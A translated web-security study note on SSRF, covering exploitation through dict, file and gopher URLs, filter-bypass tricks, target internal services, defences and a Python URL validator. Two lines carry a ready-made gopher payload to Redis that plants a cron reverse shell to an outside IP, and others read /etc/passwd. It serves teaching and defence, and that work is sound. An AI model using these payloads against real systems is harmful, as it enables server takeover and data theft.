Web Security Learning Notes: A Brief Analysis of SSRF Vulnerabilities

顺舟难度同心人 同梦相思心上人

1. Introduction

SSRF, Server Side Request Forgery (服务端请求伪造).

SSRF refers to a situation in which an attacker, without having gained full control of a server, abuses a vulnerability in it to make the server send a crafted request, under its own identity, into the internal network where the server resides. SSRF attacks usually target internal systems that cannot be reached directly from the external network.

1.1. Impact

SSRF can be used to port-scan the external network, the internal network the server sits in and the local host, to attack applications running on the internal network or locally, or to read local files through the file protocol.

Internal services are generally defended more weakly than external ones; some internal services even omit authentication for internal access for the convenience of operations. An SSRF vulnerability therefore usually causes considerable harm.

2. Exploitation Methods

SSRF can be exploited in many forms and in different scenarios, and different exploitation and bypass techniques apply to each scenario.

Taking curl as an example, the dict protocol can be used to operate Redis, the file protocol to read files, and the gopher protocol to obtain a reverse shell. Common payloads look like this:

curl -vvv 'dict://127.0.0.1:6379/info'
curl -vvv 'file:///etc/passwd'
# Note: put the URL in single quotes to avoid shell $variable expansion
curl -vvv 'gopher://127.0.0.1:6379/_*1%0d%0a$8%0d%0aflushall%0d%0a*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$64%0d%0a%0d%0a%0a%0a*/1 * * * * bash -i >& /dev/tcp/103.21.140.84/6789 0>&1%0a%0a%0a%0a%0a%0d%0a%0d%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0a/var/spool/cron/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$4%0d%0aroot%0d%0a*1%0d%0a$4%0d%0asave%0d%0aquit%0d%0a'

3. Relevant Dangerous Functions

The dangerous functions involved in SSRF are mainly those that perform network access, in particular network reads that support pseudo-protocols. Taking PHP as an example, the functions involved include file_get_contents(), fsockopen() and curl_exec().

4. Filter Bypasses

4.1. Alternative IP Address Notations

Some developers filter out internal IP addresses by matching the incoming URL parameter against regular expressions such as the following:

^10(\.([2][0-4]\d|[2][5][0-5]|[01]?\d?\d)){3}$
^172\.([1][6-9]|[2]\d|3[01])(\.([2][0-4]\d|[2][5][0-5]|[01]?\d?\d)){2}$
^192\.168(\.([2][0-4]\d|[2][5][0-5]|[01]?\d?\d)){2}$

This kind of filter is bypassed by rewriting the IP address in a different notation. For example, the address 192.168.0.1 can be rewritten as:

- Octal: 0300.0250.0.1
- Hexadecimal: 0xC0.0xA8.0.1
- Decimal integer: 3232235521
- Hexadecimal integer: 0xC0A80001
- Last two octets merged: 1.1.278 / 1.1.755
- Last three octets merged: 1.278 / 1.755 / 3.14159267

In addition, each component of the address may use a different base, so the notations can be mixed.

When a rewritten address is accessed, Apache responds with 400 Bad Request, but other services such as Nginx and MySQL keep working normally.

The address 0.0.0.0 also reaches the local host directly and is usually missed by regular-expression filters.

4.2. Domain Names That Resolve to Internal Addresses

If the server does not resolve the hostname to an IP address before filtering internal addresses, a domain name that resolves to the internal network, such as localhost, can be used.

xip.io also provides a convenient service: subdomains of that site resolve to the IP address they contain, so 192.168.0.1.xip.io resolves to 192.168.0.1.

4.3. Exploiting URL Parsing Problems

In some cases the back-end program parses the URL being accessed and filters on the parsed host address. If the URL parameter is parsed incorrectly, the filter can be bypassed.

Take http://www.baidu.com@192.168.0.1/ as an example. If the back end parses this URL with an incorrect regular expression (for instance, one that treats everything between "http" and "com", i.e. www.baidu.com, as the host of the request), it is likely to conclude that the host is www.baidu.com, while in reality everything this URL requests is served by 192.168.0.1.

4.4. Using Redirects

If the back-end server correctly parses the URL's host after receiving the parameter and filters it, a redirect can be used to bypass the filter.

For example, a redirect service such as http://httpbin.org/redirect-to?url=http://192.168.0.1 can be used. Because that URL still contains an internal IP address like 192.168.0.1, it may itself be caught by the regular expression; this can be avoided by going through a URL shortener.

The commonly used redirects are 302 and 307. The difference is that a 307 redirect forwards the body of a POST request, whereas a 302 redirect does not.

4.5. Using Non-HTTP Protocols

When the server-side program checks the protocol of the URL being accessed, non-HTTP protocols can be used for exploitation.

With gopher, for instance, a POST or GET request can be constructed inside a single url parameter in order to attack an internal application. The gopher protocol can be used to attack an internal Redis service with a URL like the following:

gopher://127.0.0.1:6379/_*1%0d%0a$8%0d%0aflushall%0d%0a*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$64%0d%0a%0d%0a%0a%0a*/1* * * * bash -i >& /dev/tcp/172.19.23.228/23330>&1%0a%0a%0a%0a%0a%0d%0a%0d%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0a/var/spool/cron/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$4%0d%0aroot%0d%0a*1%0d%0a$4%0d%0asave%0d%0aquit%0d%0a

Besides gopher, the file protocol is also commonly used in SSRF. It is mainly used to access files on the local machine, in a format like file:///path/to/file. Using the file protocol sidesteps any filtering the server applies to the IP address being accessed. For example, file:///d:/1.txt reads the file 1.txt from drive D.

4.6. DNS Rebinding

A common protection is: the server first performs a DNS lookup on the hostname in the user-supplied URL parameter, then checks the IP address returned by the DNS server, and refuses the request if that address is on a blacklist.

However, there is a time gap between the first DNS lookup used for the check and the second lookup the server performs when it actually requests the URL. This gap enables a DNS rebinding attack.

To carry out DNS rebinding, one needs a domain name whose resolution is delegated to a DNS server under one's own control, with a custom resolver on that server and a TTL of 0. The complete attack flow is:

1. The server receives the URL parameter and performs the first DNS lookup, obtaining a non-internal IP address.
2. The server checks that IP, finds it is not on the blacklist, and passes the request.
3. The server then accesses the URL. Because the DNS server set a TTL of 0, the name is resolved again, and this time the DNS server returns an internal address.
4. Since validation has already been passed, the server returns the result of accessing the internal resource.

4.7. Using IPv6

Some services do not take IPv6 into account while the internal network does support it. In that case the IPv6 local addresses such as [::] or 0000::1, or internal IPv6 domain names, can be used to bypass the filter.

4.8. Using IDN

Some network clients such as curl support Internationalized Domain Names (IDN). An internationalized domain name, also called a special-character domain name, is an Internet domain name composed partly or entirely of special characters or letters.

Some of these characters undergo an equivalence conversion when accessed; for example, a domain spelled with such characters is treated as equivalent to example.com. In the same way, characters such as ① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ can be used to bypass internal-network restrictions.

5. Possible Exploitation Targets

5.1. Internal Services

- Apache Hadoop remote command execution
- axis2-admin deployment server command execution
- Confluence SSRF
- CouchDB web API remote command execution
- dict
- Docker API remote command execution
- Elasticsearch engine Groovy script command execution
- ftp / ftps (FTP brute force)
- GlassFish arbitrary file read and war deployment leading to indirect command execution
- gopher
- HFS remote command execution
- http, https
- imap/imaps/pop3/pop3s/smtp/smtps (brute-forcing mail usernames and passwords)
- Java debugging interface command execution
- JBoss remote Invoker war command execution
- Jenkins Scripts interface command execution
- ldap
- mongodb
- php_fpm/fastcgi command execution
- rtsp
- smb/smbs (connecting to SMB)
- sftp
- ShellShock command execution
- Struts2 command execution
- telnet
- tftp (UDP protocol extension)
- Tomcat command execution
- WebDAV PUT upload of arbitrary files
- WebSphere Admin war deployment leading to indirect command execution
- ZenTao PMS remote command execution

5.2. Redis Exploitation

- Writing an SSH public key
- Writing a crontab
- Writing a WebShell
- Writing startup items on Windows
- Master-slave replication to load a .so file
- Master-slave replication to write files without corruption

5.3. Cloud Hosts

In cloud environments such as AWS and Google, accessing the cloud platform's metadata API or management API can, in some cases, expose sensitive information and produce similar effects.

6. Defenses

1. Filter the information returned to the user.
2. Unify error messages.
3. Restrict the ports that may be requested.
4. Disable uncommon protocols.
5. Against DNS rebinding, consider DNS caching or a host allowlist.
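
The checks above, together with the bypasses from section 4 (alternative IPv4 notations, 0.0.0.0, names such as localhost or 192.168.0.1.xip.io that resolve to internal addresses, user-info confusion like http://www.baidu.com@192.168.0.1/, the gopher/dict/file schemes, IPv6 loopback, and DNS rebinding), can be combined into one egress validator. The following Python example is added here and is not code from the original notes. The DEMO_DNS table and the addresses in it are constructed test data, and the allowed scheme and port sets are assumptions a deployment would tune.

```python
"""Validate a user-supplied URL before the server fetches it (added example).

Closes the SSRF bypasses discussed in the notes: octal/hex/integer/merged-octet
IPv4 notations, 0.0.0.0, names resolving to internal addresses, user-info
confusion (http://host@internal/), non-HTTP schemes, IPv6 loopback, and DNS
rebinding (the caller connects to the exact address that was checked).
"""
import ipaddress
import socket
from urllib.parse import urlsplit

# Assumption: only plain web fetches are legitimate for this server.
ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443}


def _parse_ipv4_part(part: str) -> int:
    """One dotted component with inet_aton(3) rules: 0x = hex, leading 0 = octal."""
    if part[:2].lower() == "0x":
        return int(part[2:], 16)
    if len(part) > 1 and part[0] == "0":
        if not part.isdigit():
            raise ValueError(part)
        return int(part, 8)
    return int(part, 10)


def canonicalize_ipv4(host: str):
    """Dotted-quad form of any inet_aton-style literal ('0300.0250.0.1',
    '0xC0A80001', '3232235521', '127.1'); None if host is not such a literal."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4 or not all(p.isalnum() for p in parts):
        return None
    try:
        values = [_parse_ipv4_part(p) for p in parts]
    except ValueError:
        return None
    *head, last = values
    # Leading components are one byte each; the last one fills the remaining bytes.
    if any(v > 0xFF for v in head) or last >= 1 << (8 * (4 - len(head))):
        return None
    total = 0
    for v in head:
        total = (total << 8) | v
    total = (total << (8 * (4 - len(head)))) | last
    return str(ipaddress.IPv4Address(total))


def is_internal_address(ip: str) -> bool:
    """True for any address an outbound fetch must never reach."""
    addr = ipaddress.ip_address(ip)
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped:
        addr = addr.ipv4_mapped  # ::ffff:10.0.0.1 is really 10.0.0.1
    return (addr.is_private or addr.is_loopback or addr.is_link_local
            or addr.is_multicast or addr.is_reserved or addr.is_unspecified
            or not addr.is_global)


def _system_resolver(host: str):
    """getaddrinfo wrapper returning every answer, so a response that mixes
    public and internal addresses is rejected as a whole."""
    try:
        infos = socket.getaddrinfo(host, None, proto=socket.IPPROTO_TCP)
    except socket.gaierror:
        return []
    return sorted({info[4][0].split("%")[0] for info in infos})


# Constructed DNS table for offline demonstration; these are not real lookups.
DEMO_DNS = {
    "www.example.com": ["93.184.216.34"],
    "localhost": ["127.0.0.1", "::1"],
    "192.168.0.1.xip.io": ["192.168.0.1"],
}


def demo_resolver(host: str):
    return DEMO_DNS.get(host, [])


def validate_outbound_url(url: str, resolver=_system_resolver):
    """Return (hostname, pinned_ip, port) for a URL that is safe to fetch, or
    raise ValueError. The caller must connect to pinned_ip (sending the Host
    header / SNI for hostname) instead of resolving again, which defeats a
    TTL-0 rebinding, and must pass every redirect target back through here."""
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        raise ValueError(f"scheme not allowed: {parts.scheme!r}")
    host = parts.hostname  # user-info is dropped: user@target yields target
    if not host:
        raise ValueError("missing host")
    port = parts.port or (443 if scheme == "https" else 80)
    if port not in ALLOWED_PORTS:
        raise ValueError(f"port not allowed: {port}")
    literal = canonicalize_ipv4(host)
    if literal is None:
        try:
            literal = str(ipaddress.ip_address(host))  # IPv6 literal, e.g. 0000::1
        except ValueError:
            literal = None
    addresses = [literal] if literal else resolver(host)
    if not addresses:
        raise ValueError(f"{host!r} does not resolve")
    for ip in addresses:
        if is_internal_address(ip):
            raise ValueError(f"{host!r} -> {ip} is an internal address")
    return host, addresses[0], port


def is_url_allowed(url: str, resolver=_system_resolver) -> bool:
    """Boolean wrapper around validate_outbound_url."""
    try:
        validate_outbound_url(url, resolver)
    except ValueError:
        return False
    return True


if __name__ == "__main__":
    for u in ["https://www.example.com/", "http://0300.0250.0.1/",
              "http://www.baidu.com@192.168.0.1/", "http://[0000::1]/",
              "gopher://127.0.0.1:6379/_", "http://192.168.0.1.xip.io/"]:
        print(f"{u:40} allowed={is_url_allowed(u, demo_resolver)}")
```

The validator normalizes numeric hosts itself rather than relying on the regular expressions from section 4.1, which is why 0300.0250.0.1, 0xC0A80001 and 3232235521 are all recognized as 192.168.0.1. It uses urllib.parse, so the user-info trick from section 4.3 yields the real host, and it returns the resolved address so the HTTP client can connect to it directly; a client that resolves the name a second time would reopen the DNS rebinding window from section 4.6.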

7. Reference Links

- SSRF Vulnerability Analysis and Exploitation: https://blog.csdn.net/smli_ng/article/details/106679572
- A New Era Of SSRF: https://www.blackhat.com/docs/us-17/thursday/us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf
- On Preventing SSRF Vulnerabilities in Python Development: https://www.leavesongs.com/PYTHON/defend-ssrf-vulnerable-in-python.html
- SSRF Tips: http://blog.safebuff.com/2016/07/03/SSRF-Tips/
- SSRF in PHP: https://joychou.org/web/phpssrf.html